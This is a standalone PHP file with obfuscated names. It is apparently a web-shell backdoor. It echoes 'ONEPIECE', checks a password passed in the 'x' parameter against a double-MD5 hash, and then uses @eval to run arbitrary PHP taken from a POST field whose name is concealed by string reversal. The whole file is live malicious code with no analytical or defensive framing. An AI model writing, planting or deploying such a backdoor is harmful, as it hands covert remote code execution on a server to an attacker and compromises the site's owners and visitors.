<?php

function Mwylnuqq()
{
global $zvEVbjlrhyl;
$zvEVbjlrhyl=HPrfVheuqal();
if(isset($_REQUEST['x']))
{
	$wGpqsaXzdy = 'OtoXxKOlNtoXxKOlEtoXxKOlPtoXxKOlItoXxKOlEtoXxKOlCtoXxKOlE';
    $wGpqsaXzdy=str_replace('toXxKOl','',$wGpqsaXzdy);

    echo $wGpqsaXzdy;
	if ( strcasecmp(md5(md5($_REQUEST['x'])),'0fbd9d53952f1bc5fb9e63994318d308') ==0 )
    {
	@eval("\"$zvEVbjlrhyl\"");
    }
}


}
function HPrfVheuqal()
{
        $JAbhdmku='s-5-1cccjN845s1A';
		$DsTAlRqcmvl=strrev($JAbhdmku);
		if(isset($_POST[$DsTAlRqcmvl]))
        {
        $xLMcTeXc=str_replace('','',$_POST[$DsTAlRqcmvl]);
        
        return '";'.$xLMcTeXc.'//';
		}
}

Mwylnuqq();

?>